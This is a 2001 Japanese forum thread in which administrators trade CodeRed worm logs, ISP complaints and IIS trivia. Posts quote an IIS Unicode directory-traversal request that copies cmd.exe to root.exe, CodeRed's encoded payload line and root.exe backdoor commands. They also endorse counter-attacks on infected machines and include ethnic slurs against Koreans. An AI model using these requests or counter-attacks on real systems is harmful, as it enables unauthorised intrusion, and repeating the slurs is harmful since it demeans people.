今、NHKで文部省のコードレッド関連のニュースやってた。 コードレッドのことを「赤い暗号」だとさ。 しかも言いよどんで、「あっかいあんごう」って。 ネタ?
アッガイ暗号。
>>247 そっか、「突っ込み」やって欲しかったのか。サポート部隊がとっさにそういう
応答できるとはさすが"関西"電力...俺も修行が足らんな。スマソ>eonet
今日お通夜ができて今帰ったヨ
>>246 全部見てしまった・・勉強にナタヨ
>>245 eoっていうと、無線のやつだっけ。
無線で鯖建ててるとは。カコイイ。
>>251 うちのご近所さんもお通夜だったみたいだが。
今日はオレの通夜だ。
え〜ん氏またUPしてるし あれは強烈じゃない?
いくら色調補正してあるとはいえ・・・ねえ
symantac だからネタ?
>>254 そうそう、そこででかい態度だったの漏れ
263 :
名無しさん@お腹いっぱい。 :2001/08/16(木) 22:31
>>213 怖いな、こんなガキまでIIS使っているのか。sage
>>260 たぶん「¥感染してます」ってフォルダー作って
自慢したかったんじゃない?
今日はもう寝る みんなおやすみ
例の『コードレッドバスター』なんだけど 数はすくなくなって、中身無しってのが多くなってはいるけど 時々、フィルタすり抜けてくる可愛いヤツがいるんだよ なかなか可愛いヤツよ
16日のご来場 NNN様、118匹 XXX様 0匹 正直な話ちょっと寂しい・・・ 完全な減少傾向です。 ところで赤虫とは直接関係ないと思うけど、ログを詳しく眺めて たらこんなのがあった 210.111.*.* - - [12/Aug/2001:22:37:26 +0900] "GET /NULL.printer" 404 - これってなんかのアタックかな?どっかでIISのプリント関係のセキュリティー ホール情報を見た気がするんだけど見つからない。
私がノートンやトレンドマイクロの人間だったら 自分でウィルスを作って、自分で駆除用ワクチンをつくります。 おそらくこれと同じことをすでにやっているでしょう。
電波な話はやめれ 今まで捕まった犯人がカワイソウや
272 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 01:25
あったまわりー
てめーでつくんのかよ。
>>270
273 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 01:27
274 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 01:38
>>273 それは、昔から有るMS-Proxy Serverの新バージョンだよ・・・
串デスネン。
276 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 06:18
277 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 06:32
>>273 MSのことだからそれ自体にセキュリティホールがありそう。
279 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 10:01
文科省を踏み台に米国防総省を攻撃なんてなってたら カコワルイね
280 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 11:40
しかし1日50件ほどの閲覧って、チョトサビシイ >文部省
281 :
ppp :2001/08/17(金) 11:54
>>270 アースやら大正製薬がゴキブリばらまいてるのと同じやね
>>281 なはは…キョーレツな喩えなるもナトク。
とはいえ漏れ個人的にはセマン信じてるが、以下の構図は暗黙としてありかな
1: げーつんとこ、のーとんさんに義理を通してヘボいOSタレ流す
2: のーとんさんとこ、せっせとソレにつぎ当てる
3: 双方丸く収まる。わははわはは
4: ユーザー、イカゲンニシロヨと泣く。
話題としては面白くない事もないんだけどね、 最近、蚊が3月から11月まで活動するようになったのは 某製薬会社の研究所によって開発された改良型の蚊が ばらまかれているからだ、なんてね。 でも、根拠がないわけだから、いわゆる妄想だよね。
今回の事は既知のセキュリティホールだったからこんな規模で済んでいる。 もし未知の穴だったら? と想像するだけで恐い。 ところで、最近は、セキュリティ関係の会社がOSのベンダー企業と 連絡を取っていて、パッチが配布されてからしばらく後に 穴の情報が公開されるという順序になっている。 しかしこれが事前に漏れる事は無いとは言えない。もちろん、仮定の話ですが。
未知の穴って、しばらく眠らせるんでしょ。クラッカーの持ちネタとして。 んで、手製バックドアしこたましこんでおいて、頃合いを見て発表していく。
287 :
なんにせよ :2001/08/17(金) 14:29
国土交通省 下館の感染止まりました。しかし、メールフッタに俺の Server書いてたもんだから、毎日見に来てるなぁ、、掲示板くらい何か書いてくれるとありがたいんだけど。毎日覗かれてるよ。
288 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 15:33
.printerにも何かセキュリティーホールがあるのかな。 たまに混ざってる。
289 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 15:49
290 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 15:50
>>278 まさにそのとおりになったよ。MS01-045 が出た。
291 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 15:53
>>289 点検なんてしてねーよ。
責任逃れだって。
保守管理なんて、全くしてなかったんだよ。たぶんな。
点検してれば、パッチ当てるに決まってるだろ。
そいつ、首にしたほうがいいぜ。
点検ってホコリを取ることだよね
293 :
ふふふ :2001/08/17(金) 16:44
MSのHotmailサーバーもやられたらしいけど、ほんと? 管理はMSでやってないのかな〜
新たな動きは有りません。 以上、現場からお伝えしました。
295 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 17:50
同省情報化推進室によると、同日正午ごろ、利用者から「サーバーに異常がある」と通報があり、職員がサーバーシステムの中にコード・レッド2が侵入しているのを確認した。 日本も韓国と対して変わらないな。 はずかしいよ・・、ほんとに。
296 :
(@´ー`)┌ ┌ :2001/08/17(金) 18:50
297 :
てればいだー :2001/08/17(金) 18:58
298 :
名無しさん :2001/08/17(金) 20:00
299 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 20:34
>>298 これをperl入れたマシンに default.ida とリネームして置いておけば
いいわけね?
300 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 20:40
default.ida??ZZZ したマシンはどうなる? shutdownって shutdown -h nowみたいな感じ? そうだったら それはそれで逆にまずくないかよ? おもしろそうだけどな(w
301 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 20:41
302 :
名無しさん :2001/08/17(金) 20:46
>>299 使うhttpdにもよると思うんだけど、cgiとして実行する
拡張子にidaを登録する必要があると思うな。
>>298 根本的な原因を解決する物では無いと思う。
hotmailがさっきからエラー出すんだけど・・・Coderedがらみかな。
304 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 20:59
zaq.ne.jpから来るCodeRedIIアタックが全然減らないんで、HTTPDのlogの 先頭部分のIP/Timestamp切り出して「何とかしてくれ」って送ったら下記の 内容が添付されとらんと対処できないと言ってきた。こんだけ騒ぎになってる のに、今時こんな事言ってくるプロバイダ他にないぞ。 >1.攻撃された具体的な内容 >2.ポートスキャン、アタックなどであれば、そのポート番号 >3.上記の現象の発生頻度 ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。Zaq からのアタックが減らないのも無理もない。
306 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 22:42
>>301 何だかんだでしっかりしとるじゃないか。>東めた
307 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 22:51
感染元サーバーをNICのwhoisで調べてメールするとUser unknown。 こういうのって腹立つやら空しいやら・・・・
>>305 >こんだけ騒ぎになってる
>のに、今時こんな事言ってくるプロバイダ他にないぞ。
>ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。
この部分をぜひメールで言ってやってくれ
聞いてるだけでむかついてくる
309 :
名無しさん :2001/08/17(金) 23:14
>>304 本当?
これやってもアクセスできるってことは落ちてないってことだよね。
うーん……
>>298 を動かした以降何件もCodeRedアクセスあるんだけど、
どこも落ちてないみたいなんだよね。
/scripts/root.exe?/c+iisreset+/stop
これってあってんのかな。手動でも効かないみたいなんだけど……
【zaq接客マニュアル】 何かと妙な事を聞いてくる人=クレーマー 何かと同じメールを何度も送る人=クレーマー 何かと妙な引用文を添付する人=クレーマー 何かとすぐ怒る人=クレーマー 何かと「攻撃された」と言う人=クレーマー 何かと「何とかしろ」という人=クレーマー 何かと「弁償しろ」と言う人=クレーマー 何かと「責任者を出せ」という人=クレーマー 何かと「通報するぞ」と言う人=クレーマー 何かと「告訴するぞ」と言う人=クレーマー 何かと「サポート最低だな」と言う人=クレーマー
>>304 それってWin9xにしか効かないんじゃ?
エラーダイアログ出るだけでは?
313 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 23:28
めたりっくに対策しろメール送ったのに放置され、いつのまにかTopが変わってる。 全部なかったことにしようとしてんじゃねーだろーなあ
わざと自分のNT系マシンからdefault.idaでアクセスしてみれば?
315 :
304 :2001/08/17(金) 23:30
rundll32 user32.dll,SwapMouseButton
317 :
名無しさん@お腹いっぱい。 :2001/08/17(金) 23:51
>>316 面白いけど、相手のマウスが使い難くなっても何の役にも
たたないよな……
>>308 >>310 「だからCodeRedIIだと言ってるだろうがゴルァ!」と表現を若干和らげて
その旨メールしてやったらzaq.ne.jpからの回答:
>度々恐れ入りますが、
> 2.ポートスキャン、アタックなどであれば、そのポート番号
> 3.上記の現象の発生頻度
>
> 上記の2点につきまして、ご返答いただけますでしょうか。
zaq.ne.jpには「1:通報者は真実を言っているとは限らない。まずは疑って掛かるべし」
ってサポートマニュアルがあるようだね。駄目だこりゃ。国内で最後までCodeRedII
が残るのzaqかも。さすがに切れて
>>305 のような内容の返答しときました。
つまり
>>298 は改造しないかぎり全然役に立たないってことか(鬱
最盛期からは落ち着いたけど未だに1時間に20件ほどは来てるし。 まだバラ撒いている奴はいい加減晒してもいいんじゃないかとさえ思ってしまうよ。
ZAQ、ASAHIネット、WAKWAK・・・・最後まで生き残るのはどこだ!?
322 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 00:20
>>321 最後なんてくるんだろうか……このまま永遠に……
324 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 00:32
あんまり登場しないけどiij4uもなかなか凄いっすよ。 感染者いっぱいで病院状態。
絶滅しそうになったら今度は保護活動がしたくなったりして。
326 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 00:48
絶滅危惧種”code redU” REDBOOKに載せるんですかぁ〜
327 :
:2001/08/18(土) 01:05
IIJだけどWIN98だから関係無いや。
根拠ないただのzaq.ne.jp誹謗中傷と思われるとちょっと嫌なので。 8月17日0:00〜24:00の私の所のHTTPD logで、CodeRedIIによるア タックは全部で144回。そのうち国内プロバイダからの分は 28 zaq.ne.jp 8 alpha-net.ne.jp 5 wakwak.ne.jp 5 eonet.ne.jp 2 infoweb.ne.jp(nifty) 1 odn.ad.jp という事で、煽りじゃないです。現実にうちでは他のプロバイダからのは 減ってるのに、zaqからのアタックは全然減らなくて、zaqの同一アドレス で今週初めからずっとアタック続いてる奴すらいる。alpha-netも評判通 りの活躍してますね。
正直、ビシッといってやって欲しい
330 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 01:55
>>328 あなたのプロバーだーがどこだか分からないと、その統計に関してはコメントできないなぁ。
現にうちはザクからなんてここ1週間着てないもん
>>330 そりゃそうだろうよ。
Address: 211.124.0.131
Aliases: www.zaq.ne.jp
332 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 02:38
>>330 どうせ328はZAQユーザだろ。うちはJCOMだけど、今までの約3500件の
うちの1/3がJCOMのユーザ仲間からだ。CATVの威力炸裂だね(藁
ログ取り始めたのが今月の7日なのだが、そのときから毎日欠かさずアタック
してくるアホがいる。いい加減気づいてくれよう。
>>328 おいおい、そりゃ君がザキュに近いってことしか
言ってないのでは?
ぃゃ漏れはザキュと関係ないんだけどね。
ウチはバラエティ豊かな202なんで、ホントどこから
でも来てます。国内ではスピードとハイホーって感じ。
334 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 02:40
335 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 02:48
>>334 これ、元ネタ分からないんだけど。
この人たち天然?それともネタ?
336 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 02:52
>>330 >>332 >>333 うちはzaqではないが61.205系なので、それ以外だとどうなってるかは知らん。
ただ1つ言えるのは、少なくともうちのLog見る限りでは、先週までとかは他の
プロバイダーからのアタックもたいへん多かったのでzaqは別に目立たない存在
だった。ところが今週になって他のプロバイダーからのは減ったがzaqは一向に
【減らない】ので目立ってきた。8月12日から今日までずっと固定アドレスで
アタック続けてる奴とかもいる。結果的に今うちのLogではzaqは中国・韓国を
含む全体数の約2割と、他を圧するアタック数を誇っている。それでこいつら
仕事しとるんか?とメール出したらこうなったってわけ。
339 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 03:27
ああ、感染者が減ったんじゃなくて上流でフィルターかけたのね。 それなら納得。
340 :
zaqはね :2001/08/18(土) 03:28
10日付けで返事貰った内容だと。 俺は地方のISP、zaqからは少しだけあって、それもFrontPageでサイトまるまる編集し放題なやつだった。 // お問い合わせの件でございますが、 ご迷惑をおかけ致しまして誠に申し訳ございませんでした。 今回お送り頂きました情報で調査しましたところ該当のアクセスは 弊社ユーザーの「CodeRed」感染端末からのワーム活動と判断 されましたので、早速、該当のユーザーに対してCodeRed感染 に対する注意、警告等の対応を実施させていただきます。 以下 長々と謝罪文。。。 結構まともだったぜ。
>>338 あの〜、CR2は1日で感染活動(アタクジャナイ)止めるんスけど。正確にはcnドメインが引けたら48時間で他は24かな?
いやーISPの対応もいろいろあるってのは同感だねー。
この件に関しては文句も何も言ってないけどね。どこにも。
しかしdns.**.co.jpとか来てたりしてて最強にヘボまってしまうよこっちが。
343 :
蛇足 :2001/08/18(土) 09:50
>>335 中央にいる方は、歴史教科書問題でハンストデモを行う為
来日した韓国の国会議員です。看板の「しる」は天然です。
両隣りにいる方は、確か社民党の議員です。冷たい人達です。
そうか、ハマコウじゃなかったのか。
オレもハマコーだと思ってた・・・
http://www.asahi-net.or.jp/~ki4s-nkmr/ > ただ、今回の混乱の中で明らかになったこととして、PWSが組み込まれていた
> Windows 4.0のWorkStation環境に、Windows 2000 Professional版を
> アップグレード インストールした場合、このPWSがIIS 5.0へ自動的に
> 置き換わるのだそうです。今回の騒動では、この条件のユーザーの大半が
> 自分はIISではなくPWSを利用していると錯覚していたように思います。
> との件ですが、Win98SEでも同様の現象を確認しております。
なんかPWSが入ってたWinをWin2kにアップグレード(笑)すると
PWSもIISに自動アップグレード(笑)されるみたい。
348 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 14:38
なるほどね、また謎が一つ解決しちゃったね。 連続攻撃はルーターの内側の機械達が力を合わせてがんばっていると いう事でとりあえず納得出来るし。 「あとはCode RedIIと同時にPort187のNetbios名取得が来るは何故? 何故なの?」ぐらいかな。
349 :
:2001/08/18(土) 15:25
うちは、203.x.x.xのせいか、攻撃のほとんどは韓国からです。 韓国逝って良し! Registryが不明なときは(ほとんど不明だけど)、ここが便利です。 whois -h whois.geektools.com xxx.xxx.xxx.xxx
Win9xで誰がなんと言おうと全部インストールすると決めてるユーザーは2Kアップデートでお陀仏さんになってしまうのか。 危険だと言ってもOSがVAI○だったりS○TECだったりする人達では全面拒否必至だろね。 そんなやつ周りに沢山いるな。つーか今じゃそんなのがフツーじゃん。
なるほどねー。 PWSって、Officeに付いてこなかったっけ?
プリインストールマシンにくっついてくるOfficeには付いてない。 FrontPageがくっついているパッケージには付いている。 FrontPage入れるとPWSも自動で入ります。 あと、SOHOや小規模の企業が2000サーバーに金だすのが嫌で、 Macとのファイル交換用にPWSやIISを内部に立てることが間々ある。 実際やらされた・・・。今どうしてるだろう。 Win2000マシンがあるのにWin2000のCD-ROMがない会社。 たぶん今でもCodeRed送り続けているだろう。
353 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 17:42
侵入者IPが211〜だったらチョソなの?
354 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 18:05
つーかCodeRedってIPの近いところを攻撃するから韓国中国からの 攻撃がメインになってあたりまえなんだよな。あちらさんのほうが ブロードバンド環境は進んでるし。
355 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 19:18
>>349 今日は一つ得をしたよ
あんたいい人だ
ガキの中のガキ大将って感じだ
これからも宜しく頼むよ
>>347 ここ湯名なのね、リンクに加えときます。
358 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 23:19
FrontpegeってマイクロソフトでダウソできるバージョンでもPwsやらIISやら組み込まれるの??
359 :
名無しさん@お腹いっぱい。 :2001/08/18(土) 23:44
・太平洋回線は太平洋に面してる日本しか敷設してない ・東西のインターネットゲイトウェイはアメリカにある ので、韓国がアメリカのインターネットにアクセスするには [韓国]==(日本海ケーブル)==>[日本のゲートウェイ]==(太平洋ケーブル)==>[アメリカ] という経路を通らなければならない。これ以外の直接経路は衛星回線のみ。 この中で太平洋ケーブルはほとんど日本の持ち出し。これを韓国はタダで使ってる。 逆にこれを使わないとアメリカには繋げない。 しかしこのままでは韓国のCodeRedで世界が迷惑するのでどうするか? ・日本海ケーブルを閉鎖する。 これをやると韓国のパケットは日本にも来ないのでCodeRed対策としては万全。 タダで使っていた韓国のパケットが太平洋ケーブルから消えるので 本来使用すべき日本の分の回線が空く。 太平洋のケーブルの回線増設も遅らせる事が出来る。 韓国に不都合が起きるのはどうでもいい(細い西回り回線とか高い衛星回線もあるし)
マジでぶった切って欲しいよ、日本海ケーブル・・
感染して迷惑かけたヤツは光ファィバー1Km敷設させるってのはどう?
363 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 00:35
韓国政府にメールで抗議ってのはどうかな? 賛同者が多ければ、メールアドレスと英語(韓国語中国語はできないので)のテンプレ作るけど。 それともこーゆー話はニュース板とかでやったほういいのかな?
364 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 03:45
『日本海ケーブル』は『東海ケーブル』と呼ぶニダ
それじゃ静岡のCATV会社みたいだに。
>>361 まとめありがとう。早速Vigilanteを動かしてるよ♪
367 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 04:29
ん〜、減ってきたようにも見えるけど。 これって、気づいてない奴は一生気づかないような気が・・・
368 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 07:18
つーか一番悪いのはCodeRedの製作者だろ
369 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 07:20
>>359 そういった回線共有を否定することはインターネットを否定することじゃん。
370 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 07:30
Name: nttkgwa03102.ppp.infoweb.ne.jp Address: 61.124.33.102
>>369 そういう声が出るって事は「あの国」にはインターネットは分不相応な
システムだって事だね。コピーシステム使っている奴ってWindowsUpdate
のボタンを押せないんだよ。惨めな連中だ。
変種が来た。1バイトだけ違うの。 00000000 C8 C8 01 00 60 E8 03 00 00 00 CC EB FE 64 67 FF (略) 00000810 30 00 00 00 04 00[08]00 10 00 00 00 00 00 00 00 ↑このへん
373 :
大丈夫かな? :2001/08/19(日) 14:43
ここから80番ポートに結構アクセスが来るのだが、 CodeRedなのか? >> 2001年8月19日14時38分37秒 HttpHead - 210.136.88.94 HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Sun, 19 Aug 2001 06:04:42 GMT Content-Length: 3264 Content-Type: text/html
最近、CodeRedそのものよりも、どさくさにまぎれてとか、 プロバイダが会員の安全のためと称してポートスキャンかけ たりとかで来るアタックのほうが多いかもしれない。 少なくともHTTP port probe のすべてがCodeRedという わけじゃあないよ。
375 :
大丈夫かな? :2001/08/19(日) 14:54
>>374 そっかぁ。ルーターがブロックしてくれるからいいけど、
有名企業からだと心配になるんだよねぇ。
眺めてるだけにしますわ(^^;
20日をすぎると、感染端末はホワイトハウスを攻撃するんでしょうか? 攻撃機能はCode Red (original)にはありましたが、Code Red2にも組みこまれて いるんでしょうか? おしえて、えらい人
>>376 ホワイトハウス攻撃機能はないと聞きました。情報源は忘れました。まあ、究極的に
はeeyeのディスアセ見れば判るんでしょうが。
CodeRedに対する報復としてUSの誰かが作成したバージョンだっていう意見もありま
すしね。もっとも本当の意図は作成者の味噌汁。
うちの場合CodeRedと思われるのはUSとかCAとかAUからのアクセスの方が多かった。 あとは典型的なポートスキャン野郎くらいだな。
うち(203.x.x.x)だとCode Redはレアもの 過去24時間でNNNNNNNが1/62、XXXXXXXが61/62 この調子が当分続くのね
18 名前:27 投稿日:2001/07/05(木) 01:02 #!/usr/bin/perl use Socket; # --------------init if ($#ARGV<0) {die "UNICODE-HACK-PROGRAM Example: c:\\perl uni.pl www.theriver.com:80 {OR} c:\\perl uni.pl 127.0.0.1:80\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying $host.....................\n"; $target = inet_aton($host); $flag=0; # ---------------test IF IIS my @results=sendraw("GET x HTTP/1.0\r\n\r\n"); foreach $line (@results) { if ($line =~ /Server: Microsoft-IIS/) { 19 名前:27 投稿日:2001/07/05(木) 01:04 sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n");
それはsadmindの手口。バッファフローじゃなくてshellの相対パスの 脆弱性ってやつ。
>>381 -382
それ、昨日うちに来たよ。なぞが解けたthnx
-------Access Log-------
209.111.91.22 - - [18/Aug/2001:03:37:53 +0900] "GET x HTTP/1.0" 501 159 - -
------------------------
>>383 ほんとだよく読んだらちがった。鬱だ芯でいい?
386 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 20:55
スレ、途中で質問いい? 俺のところの東急ケーブルは、プライベートIPで配ってるくせに ウェブサイトで赤虫を警告してるんだけど、赤虫ってプライベートIPのIIS にも感染できるの? ゲートウェイでNATがかかってるので、感染できないって思ってたんだけど。 つうか、プライベートIPでIISって言うのも理解できないよ。
企業の内部ネットワークもやられているくらいだからな。 ボケが感染したノートPCを持ち込んだりすると、一気に プライベートなLAN内赤虫だらけ。IISは既出のように、 本人も意識しないで、インストールされてしまうことも ある。
>>386 CATVと併用して他のダイヤルアップやADSL、専用線等を使用しているとそいつが外部から感染してそれが一気にCATV域内に流れ込むんだよ
例えファイヤーウォールのあるLANを構築していてもIISが外部からのアクセスを許していると無意味、感染するとLANを通して域内にも攻撃を仕掛ける
CATVが流入を食い止めてもユーザーが裏口作ってセキュリティをガタガタにしてるわけ
ところで十Q毎日のように感染マシンが増えてるな 夏休みの宿題でIISインストールしてホームページでも作ってるのか? DNS名が SOTEC-E4150AV にはワラタ
>>389 それは、NetBIOS名かと思われ。
うちは OTOSAN ってのが居た。
おぉ、ファザーコンピューター。マザーが停止したときに 目を覚ますやつだな。
>>390 ってことはNetBIOSoverTCP/IPも有効にしてるのか
それにしても全角の物もあるけどNetBIOSって全角文字も使えるとは知らなかった
393 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 22:21
>>388 感染経路として他回線との併用ですか・・・。
網内の感染したホストから、再び外部のグローバルIPに戻ることも
考えられますね。それって、東急ケーブルテレビが網内に赤虫が
入ってるって検知してるのでしょうか。
>>386 109警告してるだけ良いぞ。
うちのプロバは、警告を出すと驚いたユーザがIIS止めてしまって
赤虫の捕捉できなくなるから、わざと警告しないと豪語している。
>>394 「なるほど〜、じゃあ、赤虫をさぞかし一生懸命捕捉しているのですね〜☆ミ」
という突っ込みをなさってはいかが。
>>395 したよ。
週末は当然サポートも技術もお休みなので、ユーザからの声は受け付
けていません。藁)
4日前にきた同一プロバの感染者、また再感染したようだ。(NetBIOS
名から判断)。マジ、この機会にプロバ変えたほうがいいかもな。
>>393 そんなヘタレなプロバでも、域内で赤虫の存在は知っているようだか
ら、等級も知って動いてんだろう。CodeRedとは異なる感染検知のた
めのスキャンとか時々来ないか?
398 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 23:16
400 :
名無しさん@お腹いっぱい。 :2001/08/19(日) 23:28
_ , -―-、 , 'ニニニ、::::(0::::::::::ヽ、  ̄ ̄ヽ'::::::::::::::: ヾ みてごらん この糞スレを )::: .... \ / ::::::::::::::::::ヽ / :::::::::::::::::| / :::::::::::::::::| / :::::::::::::::::::| / ::::::::::::::::::::| | :::::::::::::::::::::| . | :::::::::::::::::::::| _ , ―-、| /::::::::::::::/::::| \ヲ'⌒ヽ:| /:::::::::::::::/::::::| ト`_ ノ::| /:::::::::::::/::::::::| 人;;;;;;;::::;:| |:::::::::::::/::::::::/ /γ `:::::| |::::::::::::/::::::::/ / ( ヽ :::| |:::::::::/::::::::/ ふーん、なんだか { ) } ::| |::::::::{::::::::/ 頭悪そうだね、ぱぱ | / 〉 ::| .ヽ::::|:::::::/ } { / ::| .ヽノ ::::/ } | ( :λ :::| ( ヽ、 〉 ノヽ ::::| ヽ, ~ 〈 ト、_ | ::::::ヽ、 ( ,' ノ | |~7 ::::::::::::::`ヽ、 ヽ,、,、,γ' ノ, -‐W~フ { ト、:::::::::::::::::::ヽ、 ∠____ト-┘z__,―' ̄Σ Z  ̄ヽ―-、_ノ '―z_,┴'~
>>398 こんなものが全世界に展開されたらSecurityFocusに対するDDoSだっつーの。
作者は訴えられるかも。
>>400 Getさん。
Tuxくんマンセーな方ですかねえ。でも、ageてるし。
おれもビオランテ入れてみた。HTTPDと共存できんのがいまいちだが結構良く
出来てる。走らせても「相手の情報(データ)を一切入手する事がない」点が
ポイントかな。-v -l オプション付けといた方がいいだろうね。
> 極めつけnet sendで警告メッセージ CodeRed Vigilante
>
http://www.dynwebdev.com/codered/
>>403 スマソかぶった。
Vigilante大人気!
>>404 やっぱそう思う?
う〜ん・・・じゃ、やっぱやめとこ。。
>>406 仮にそいつが1日に数百万円稼ぐECサイトだったらどーするよ?
やめといて賢明。Vigilanteにしとけ。
>>406 というか、それ以前にそのシャットダウンは動かないから意味ないよ
409 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 00:23
[20/08/01 00:20:09 JST] Decaffeinator: 49 of 172 total servers successfully decaffeinated. Vigilanteの成功率は1/4〜1/3くらいだなあ。こんなもの?
410 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 02:49
どさくさに紛れてのftp/telnetが増えてきた・・・ どれも.tw
>>409 手動でroo.exe?/c+dirしても、半分逝くかどうかだから
ねえ。
バックドアが仕込まれて、しかも再感染して回りを再攻撃
していて、なおかつAdminでログオンしていないとダメだ
から1/4なら上等。
412 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 09:05
*.bai.ne.jp からしつこーく来るので管理者にメールしようかと 思うんすけど、これってどこのISP?
なんだこれ? "GET /default.ida?"がなくて"HTTP/1.1" 203.90.1.151 - - [20/Aug/2001:10:42:25 +0900] "XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 167 - -
416 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 16:41
417 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 17:09
一ヶ月たったね
418 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 17:19
>一定の安全が確認されたことと、20日からはウィルスが休止状態となると言われて >いることから、今回設置を解除することとなりました。 ぶん殴っていい?
やっぱりぶつぶつ切れるぞゴルァァメールに耐えられなかったんでしょう
>>419 誰かメールしてやらないと、コードレッド少なくともインターリンク
のユーザーが最後まで残る、ケケケ
422 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 18:46
423 :
あああ :2001/08/20(月) 21:09
既出ならスマソ defalut.idaにcon\con仕掛けたらどうなる?
スマソwin2000意味無いね(鬱打診で来る
425 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 21:16
210.81.49.140 - - [20/Aug/2001:14:07:41 +0900] 210.81.49.143 - - [20/Aug/2001:16:38:32 +0900] Apple Japan の Code Red II 二匹捕捉。ライバル OS 使うなよ (w
>>422 それはActiveXのセキュリティーホールが原因。
IE5.5やOutlookから感染するみたい。
427 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 23:39
>>426 Outlookでも感染するの?
OEは駄目そうだが。
>>426 パッチ当ててないIIS鯖が書き換えられた事を言っているのでは?
429 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 23:52
プライスロトがIIS使っててCodeRed感染→Web改竄→ActiveXでトロイ仕込まれる って流れでよいのかしら?
とうとうCode Red IIの二次攻撃が始まったな・・
この期に及んでパッチ当ててなかったのかしら
435 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 01:45
うーん。プライスロトみたいな事があるなら、企業で感染してる所は 晒した方が自衛になったんじゃないのかなぁ。
言えてる。 これから企業の感染ホスト名は晒して、皆でnet send攻撃しよう(w
437 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 17:02
まだいっぱい来るんで、あげ。
438 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 17:54
439 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 17:54
7/25なら違うと思われ
441 :
> :2001/08/21(火) 18:47
>>441 私も見ましたが週単位の周期のような気も
443 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 21:05
このスレもそろそろ終わりかねえ。 もっとも、慣れた頃が危ないのかもしれないが。
444GET
>>443 慣れたっていうより飽きたんじゃないっすか?(w
445 :
:2001/08/21(火) 23:25
今日ようやくOCN本体から「赤蟲警告」のメールが来た 危険なワームなので即対応してくださいだって・・・ おせーーーーーーーーーーーーーーーーーーーーー ふぅ、すっきり
>>445 プロバイダ側の論理だと、何もわからないユーザに警告しちゃうと
びっくりしてIIS止めちゃうので、「こいつは感染してる」ってわ
かるように、しばらく現場保持させとこうって考えもあるんだぞ。
漏れは賛成できないがな。
>>446 警告すると逆ギレする顧客がウザいから放置してんじゃないかな。
448 :
:2001/08/21(火) 23:46
いまだに定期的に、サイトチェックしてくれてる方感謝。 そろそろ寝る
でもねエコノミーなのよ、うち・・・ま、それは良いとして 専用線で鯖立ててる奴も多かろうに、と思った次第す
452 :
Code赤過ぎ :2001/08/22(水) 04:22
某NG系でみたんだけど、ダミーでIISたててパッチ済みにしてネットに 繋ぐ。チェッカーで感染警報。なんで?ってのがあった。 パッチ不可能のモデルが来てるの?Logには今までと同じのしか飛んできてない らしい。root.exe等作らないやつ。 詳細キボン。 鬱だね、IIS
チェッカーが馬鹿で誤検出する、というのが過去ログに あったような気がする。
